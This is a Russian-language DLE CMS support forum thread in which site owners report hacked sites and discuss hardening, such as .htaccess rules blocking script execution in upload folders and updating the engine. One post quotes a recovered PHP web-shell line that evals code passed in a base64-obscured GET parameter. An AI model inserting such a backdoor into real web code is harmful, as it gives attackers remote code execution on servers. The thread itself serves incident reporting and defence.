Перейти к публикации

Залили вирус iframe


Рекомендованные сообщения

Добрый день, ко мне на сайт залили вредоносный код в папку /uploads/fotos/iframe.html о чем меня благополучно уведомил Google.

Каким образом удалось это сделать?

Установлена лицензионная DLE 9.5

Изменено пользователем karpel
Ссылка на сообщение
Поделиться на других сайтах
Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован.
Ссылка на сообщение
Поделиться на других сайтах

1. Убирайте с сайта сомнительные PHP партнерки со скрипта, которые у вас стоят. И другие строронние модули.

2. Также читайте темы:

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

Ссылка на сообщение
Поделиться на других сайтах

Имею аналогичную проблему c DLE 8.5.

Сайт http://marketopedia.ru - залиты "чужие" файлы phtml и php в папки

uploads/fotos/

uploads/posts/thumbs/ файл phtml в этой папке содержал такой код (похоже как раз на injections):


<? echo eval($_GET[base64_decode('Yw==')]);?>

второй был уже сам shell, через который дальше вставляли свой код на страницы, могу прислать почтой (как txt). Через шелл добавляли в БД в начало каждой новости (короткой и полной) вызов java-скрипта с другого сайта. Поменял пароли ftp и БД, закрыл все вложенные папки upolads файлами .htacces примерно следующего содержания:

<Files ~ "^.*\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)">

    Order allow,deny

    Deny from all

</Files>

RemoveType .php3 .php .shtml .phtml .php4 .php5 .php6 .cgi .pl

Странно, что по умолчанию в образе движка эти папки не были закрыты htaccess.

Запретил редактирование шаблона из админки (правами папки).

Что еще можно сделать для защиты?

Ссылка на сообщение
Поделиться на других сайтах

Что еще можно сделать для защиты?

Обновиться до версии 9.5

Следить за http://dle-news.ru/bags/

Ссылка на сообщение
Поделиться на других сайтах

Обновиться до версии 9.5

Следить за http://dle-news.ru/bags/

Обновляться платно мне смысла нет - для этого сайта даже функционал 8.5 избыточен.

В районе нового года все обновления безопасности накатывал, сайт поломали позже.

Ссылка на сообщение
Поделиться на других сайтах

madmike3,

А кто вам сказал что вам залили через DLE, а например не через http://marketopedia.ru/forum/ или например не через уязвимый на вашем сервере https://marketopedia.ru/myadmin/ который у вас реально уязвим и можно загружать шеллы http://www.phpmyadmin.net/home_page/security/

Иногда я просто удивляюсь людям, при посещении просто их сайта я могу сказать несколько уязвимостей на сайте без DLE. А они думают что у них проблема в том что не было .htaccess, этот файл блокирует запуск скриптов а не заливку. Устранять нужно причину проблемы а не придумывать какие то обходные пути.

Ссылка на сообщение
Поделиться на других сайтах
:huh: Форум тот, это жесть полная , снеси его пока непозно.
Ссылка на сообщение
Поделиться на других сайтах

Чем этот форум заменить?

LogicBoard лучше?

А кто вам сказал что вам залили через DLE, а например не через ...

Иногда я просто удивляюсь людям, при посещении просто их сайта я могу сказать несколько уязвимостей на сайте без DLE. А они думают что у них проблема в том что не было .htaccess, этот файл блокирует запуск скриптов а не заливку. Устранять нужно причину проблемы а не придумывать какие то обходные пути.

Видимо, это удивление как раз и помешало вам заметить, что я нигде не писал, что шелл залит именно через DLE. Я пытаюсь разобраться, как мне обезопасить сайт на DLE. Если обратился не по адресу - извините, думал, что вам эта проблема может быть интересна.

Кстати, еще такой момент - у меня почему-то при сохранении образа базы через админку стало создаваться сначала два, а сейчас - три одинаковых файла. Это нормально?

Изменено пользователем madmike3
Ссылка на сообщение
Поделиться на других сайтах

что я нигде не писал, что шелл залит именно через DLE

и тем не менее ты пришел на форум поддержки ДЛЕ.

Ссылка на сообщение
Поделиться на других сайтах

и тем не менее ты пришел на форум поддержки ДЛЕ.

Если смысл предложения, следующего за процитированным, от вас ускользает - считайте, что это совпадение.

Ссылка на сообщение
Поделиться на других сайтах

суть в том, ты пришел на форум ДЛЕ с проблемой взлома, и в сообщении не указал никаких других сторонних скриптов, установленных на сервере.

логично и естественно предположить, что ты грешишь на дле. что, собственно, подтверждают сообщения участников форума.

а потом начинаешь еще и язвить. попустись немного, ок?

и свой тонкий юмор оставь для подружек.

Ссылка на сообщение
Поделиться на других сайтах

логично и естественно предположить, что ты грешишь на дле

Если есть сайт, который взломали (мне лично пока неизвестно, как именно - админы сервера тоже подключены к поискам) - логично и естественно за консультацией обратиться в т.ч. к поставщику использованной платной CMS. Нет?

Я ни одного слова плохого не написал про саму CMS, лишь спросил, как можно обезопасить сайт, работающий на ней. Более того - в посте, на который вы ответили, я очень конкретно объяснил, зачем я именно сюда пришел. Поэтому ваш следующий пост "и тем не менее ты пришел на форум поддержки ДЛЕ" мне показался следствием невнимательного прочтения моего сообщения.

Ссылка на сообщение
Поделиться на других сайтах

ладно, все в порядке

из форумов рекомендовал бы IPB. да платный, за то крутой функционал и за ним хорошо следят разрабы

Ссылка на сообщение
Поделиться на других сайтах

IPB не просто платный - он дорогой.

Кроме того, чем нравится именно dle-forum - он использует шаблон сайта (встраивается в область контента), что для моего проекта (где форум не основное) более желательный вариант.

Ссылка на сообщение
Поделиться на других сайтах

ладно, все в порядке

из форумов рекомендовал бы IPB. да платный, за то крутой функционал и за ним хорошо следят разрабы

ИБР (Российское представительство) похоже ёк, у меня лиц на ИПБ и похоже 3.3 новую приидётся покупать за ново у америкосов.

К ипб+дле есть интегра у Калиостро (15 бачей всего)

Кстати ипб тут стоит (шаблон от Фисаны) :)

IPB не просто платный - он дорогой.

Кроме того, чем нравится именно dle-forum - он использует шаблон сайта (встраивается в область контента), что для моего проекта (где форум не основное) более желательный вариант.

Я не чего не имею против ShVad, всёж как ни как старается, но всёж dle-forum пока далёк от даже логикбоард и других сравнительно молодых скриптов.

Изменено пользователем Japonec
Ссылка на сообщение
Поделиться на других сайтах

LB я сейчас на другом проекте тестирую. Если проблем не будет - заменю на него. IPB у меня тоже есть на еще одном проекте, возможности хорошо знаю, но покупать для этого сайта не готов, да и интеграция (не только синхронизация аккаунтов) потребует много усилий.

Изменено пользователем madmike3
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...